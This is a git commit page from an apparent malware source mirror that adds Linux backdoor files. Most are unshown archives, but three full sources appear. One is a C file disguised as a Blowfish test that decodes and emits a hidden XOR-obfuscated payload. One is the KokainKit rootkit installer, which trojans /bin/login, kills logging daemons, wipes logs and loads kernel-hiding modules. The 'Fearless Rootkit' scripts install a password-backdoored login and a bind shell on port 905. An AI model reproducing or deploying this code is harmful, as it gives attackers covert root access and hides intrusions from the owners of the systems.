daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

move Backdoors to 'Backdoors'

Browse Source
This commit is contained in:
Marius Genheimer
2020-11-03 21:16:20 +01:00
parent ea033b9e95
commit f48743eb43
15 changed files with 0 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Linux/Backdoors/Linux.Apache.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Bashdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Bofishy.Backdoor.a
+251
View File
@@ -0,0 +1,251 @@
/*
* Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
* Perform routine compatability checks.
*/
#include <stdio.h>
#define KEY_TEST_NUM 25
static unsigned char key_test[KEY_TEST_NUM]={
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87,
0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f,
0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
0x88};
/* DES cbc input vectors */
static unsigned char ecb_data[]={
0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c,
0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11,
0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b,
0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,
0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c,
0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,
0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40,
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01,
0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,
0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47,
0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f,
0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c,
0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12,
0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57,
0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73,
0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40,
0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f,
0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07,
0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19,
0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f,
0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41,
0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41,
0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03,
0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70,
0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47,
0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e,
0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14,
0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46,
0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a,
0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e,
0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14,
0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b,
0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e,
0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e,
0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46,
0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e,
0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40,
0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59,
0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c,
0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e,
0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06,
0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a,
0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03,
0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06,
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42,
0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d,
0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19,
0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e,
0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12,
0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d,
0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01,
0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07,
0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41,
0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a,
0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,
0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40,
0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,
0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46,
0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c,
0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02,
0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,
0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57,
0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47,
0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e,
0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c,
0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e,
0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,
0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,
0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03,
0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59,
0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63,
0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74,
0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,
0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f,
0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f,
0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d,
0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,
0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46,
0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43,
0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a,
0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,
0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,
0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,
0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,
0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,
0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f,
0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40,
0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f,
0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f,
0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f,
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f,
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49,
0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,
0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02,
0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f,
0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d,
0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a,
0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c,
0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46,
0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,
0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25,
0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,
0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,
0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,
0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,
0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,
0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c,
0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,
0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,
0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,
0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,
0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,
0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,
0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,
0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,
0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,
0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,
0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f,
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a,
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41,
0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f,
0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f,
0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,
0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f,
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41,
0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41,
0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a,
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00,
0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11,
0x09,0x1e,0x25,0x00};
/* big endian */
static unsigned long bfplain[2][2]={
{0x424c4f57L,0x46495348L},
{0xfedcba98L,0x76543210L}
};
static unsigned long bfcipher[2][2]={
{0x324ed0feL,0xf413a203L},
{0xcc91732bL,0x8022f684L}
};
static unsigned char ocb_data[]={
0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b,
0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20,
0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28,
0x00};
static unsigned char cbc_key [16]={
0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87};
static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10};
#if defined(WIN16) || defined(__LP32__)
#elif defined(_CRAY) || defined(__ILP64__)
/*
* _CRAY note. I could declare short, but I have no idea what impact
* does it have on performance on none-T3E machines. I could declare
* int, but at least on C90 sizeof(int) can be chosen at compile time.
* So I've chosen long...
* <appro@fy.chalmers.se>
*/
#else
#endif
main(void)
{
int i, n, err;
unsigned char cbc_in[40],cbc_out[40],iv[8];
dup2(1, 2);
#ifdef CHARSET_EPCDIC
epcdic2ascii(ecb_data, strlen(ecb_data));
#endif
printf("# testing in raw ecb mode\n");
n=0;
if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0)
{
err = 1;
}
if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0)
{
err = 1;
}
if (err)
{
for (i = 0; i < sizeof(ecb_data)-1; i++)
fprintf(stderr, "%c", ecb_data[i] ^ 47);
}
return(0);
}
Linux/Backdoors/Linux.DoubleDragon.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.ICMP.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Kokain.Backdoor
+174
View File
@@ -0,0 +1,174 @@
#!/bin/sh
# KokainKit v1.6 by deka
# -
# A rootkit based on knark and cobolt.
# Do not Distribute!
# -
TORNDIR=/usr/src/.puta
THEPASS=$1
DITTPORT=$2
THEDIR=/usr/lib/$THEPASS
echo "---------------------------------------"
echo " KokainKit v1.6 by dekah&self"
echo "---------------------------------------"
echo ""
echo "Using magic word $THEPASS and dittrichport $DITTPORT."
echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
if ! test "$(whoami)" = "root"; then
echo " - UID0 check failed"
echo ""
sleep 3
echo "FATAL: You're not root"
exit 1
fi
if test -d "$TORNDIR"; then
echo " - T0rnKit found. Screwing it up"
killall -9 in.inetd
killall -9 t0rntd
echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
echo "" > /usr/sbin/in.inetd
echo "ap" > $TORNDIR/.1file
echo "255.255" > $TORNDIR/.1addr
echo "255.255" > $TORNDIR/.1logz
echo "ap" > $TORNDIR/.1proc
fi
if ! test -d "/usr/include"; then
echo " - /usr/include does not exist, making it (ugly)..."
mkdir /usr/include
fi
if ! test -d "/usr/include/pwdb"; then
echo " - /usr/include/pwdb does not exist, making it (ugly)..."
mkdir /usr/include/pwdb
fi
mkdir $THEDIR
if test -d "$THEDIR"; then
echo " - Secret dir created"
else
echo " - MkDir failed"
echo ""
echo "FATAL: Unable to create the secret directory"
exit 1
fi
cd src
echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h
gcc -O2 cobolt.c -o cobolt
if test -r "./cobolt"; then
echo " - Cobolt compiled"
else
echo " - gcc failed"
echo ""
cd ..
sleep 3
echo "FATAL: Unable to compile Cobolt"
exit 1
fi
touch -acmr /bin/login cobolt
cp /bin/login $THEDIR/login1
cp cobolt $THEDIR/login2
echo " - Cobolt installed"
gcc -O2 autoexec.c -o autoexec
if test -r "./autoexec"; then
echo " - AutoExec compiled"
else
echo " - gcc failed"
echo ""
cd ..
echo "FATAL: Unable to compile AutoExec"
exit 1
fi
touch -acmr /sbin/portmap autoexec
cp /sbin/portmap $THEDIR/portmap
rm -f /sbin/portmap
cp autoexec /sbin/portmap
echo "#!/bin/sh" > $THEDIR/autoexec
echo " - AutoExec installed"
cd ..
killall -9 syslogd klogd
./wipe u root >/dev/null 2>&1
rm -f /var/log/messages /var/log/secure
cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
echo " - Logs cleaned"
#echo "" > /etc/hosts.allow
#echo "" > /etc/hosts.deny
#echo " - Hosts.deny/Hosts.allow cleaned"
echo " - Patching dittrich..."
./bpatch ./dittrich __PATCHPort__ $DITTPORT
cat <<E0F>> $THEDIR/.bashrc
alias ls="ls --color -alF"
alias dir="dir --color"
export PS1="\u@\h:\w# "
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
cd
E0F
echo " - .bashrc created"
cp -R dittrich stuff $THEDIR
echo " - Stuff installed"
mkdir $THEDIR/knrk
cd knark
make >/dev/null 2>&1
echo " - Knark compiled"
cd ..
rm -rf knark/knrksrc knark/Makefile
cp -R knark/* $THEDIR/knrk
echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
echo "$THEDIR/dittrich" >> $THEDIR/autoexec
echo "killall -31 dittrich" >> $THEDIR/autoexec
/sbin/portmap >/dev/null 2>&1
echo " - Knark installed"
if test -d "/var/named/ADMROCKS"; then
rm -rf /var/named/ADMROCKS
echo " - AdmRocks erased"
fi
cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
rm -f /etc/inetd.conf
cp /tmp/blahah /etc/inetd.conf
rm -f /tmp/blahah
echo " - Inetd.conf fixed"
PATH=/sbin:$PATH
syslogd
klogd
echo " - Syslogd/Klogd restarted"
cd ..
rm -rf *kokain*
echo " - KokainKit removed"
echo ""
#echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
if test -d "/proc/$THEPASS";
then
echo "Knark installed successfully."
else
echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
cp $THEDIR/login2 /bin/login
fi
echo "kitinst $THEPASS $DITTPORT"
# - EoF - #
Linux/Backdoors/Linux.Lyceum.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Mushdoor.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.OpenSSH-3.7.1p2.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Q.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Rootin.Backdoor.a
+85
View File
@@ -0,0 +1,85 @@
#!/bin/sh
# Fearless Rootkit T-Type v0.1
# Coded by Merlion merld_one@yahoo.com
# To run:
# chmod 755 droprk.sh
# ./droprk.sh
# Telnet to login daemon (port 513) and enter password
# Have fun!
arg="$1"
if [ "$arg" = "" ]; then
echo "Usage is: ./droprk -i (to install) -r (to uninstall)"
exit 1
elif [ "$arg" = "-r" ]; then
test -e /bin/.login && rm -f /bin/login; mv /bin/.login /bin/login; exit 0 || echo "Not installed"
elif [ $arg = "-i" ]; then
cat > /tmp/drop.c << EOF
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h> /* For daemon related functions */
#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "merlion"
char **execute;
char passwd[8];
main(int argc, char **argv) {
void die(char *error);
void connection();
pid_t pid, sid; /* Daemon variables */
signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;
if ((pid=fork()) < 0) die("Error on fork()"); /* Start daemon process */
if (pid > 0) exit(0); /* Exit parent process */
if ((sid=setsid()) < 0) die("Error on setsid()"); /* Create new session */
if ((chdir("/") < 0)) die("Error on chdir()"); /* Set working directory */
umask(0); /* Set umask to 0 to avoid unwanted rights inheritance */
close(STDIN_FILENO); /* Close */
close(STDOUT_FILENO); /* associated */
close(STDERR_FILENO); /* file streams */
/* On our own now */
scanf("%s", passwd);
if (strcmp(passwd,ROOT) == 0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0); } /* Remove?? */
else {
execv(REAL,execute);
exit(0); } /* Remove?? */
}
void connection() {
execv(REAL,execute);
exit(0); }
void die(char *error) {
perror(error);
exit(1); }
EOF
fi
gcc -o /tmp/login /tmp/drop.c
rm -f /tmp/drop.c
mv /bin/login /bin/.login
mv /tmp/login /bin/
exit 0
Linux/Backdoors/Linux.Rootin.Backdoor.b
+74
View File
@@ -0,0 +1,74 @@
#!/bin/sh
# Fearless Rootkit D-Type v0.1
# Coded by Merlion
# Website: http://areyoufearless.com
# chmod 755 rootd.sh
# ./rootd.sh
# telnet to port 905 & run commands. End each command with a semicolon (;)
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
void die(char *error);
main(int argc, char **argv) {
pid_t pid, sid;
int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen;
unsigned short int mcon;
unsigned short int port;
char *rbuf, *rmode;
struct sockaddr_in Client, Server;
if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
if (argc != 3) die("Usage");
memset(&Server, 0, sizeof(Server));
Server.sin_family=AF_INET;
port=905;
mcon=5;
Server.sin_port=htons(port);
Server.sin_addr.s_addr=htonl(INADDR_ANY);
if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
die("No socket options set");
if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
die("Could not bind socket");
if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");
pid=fork();
if (pid < 0) die("Initial fork() failed");
if (pid>0) exit(0);
if ((chdir("/")) < 0) die("Could not set working directory");
if ((setsid()) < 0) die("setsid() failed in creating daemon");
umask(0);
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);
/* You're on your own, pal.. */
while(1) {
socklen=sizeof(Client);
if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1); /* syslog msg here still */
clipid=getpid();
serpid=fork();
if (serpid > 0)
waitpid(0, &stat, 0);
dup2(sockcli, 1);
execl("/bin/sh","sh",(char *)0); }
close(sockcli); }
void die(char *error) {
fprintf(stderr, "%s\n", error);
exit(1); }
EOF
gcc -o /bin/rootd /tmp/rootd.c
rm -f /tmp/rootd.c
rootd $port $max
echo "Rootkit installed at port 905"
exit 0
Linux/Backdoors/Linux.Rrs.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Silencer.Backdoor.7z
BIN
View File
Binary file not shown.
Linux/Backdoors/Linux.Sneaky_Sneaky.a.Backdoor.7z
BIN
View File
Binary file not shown.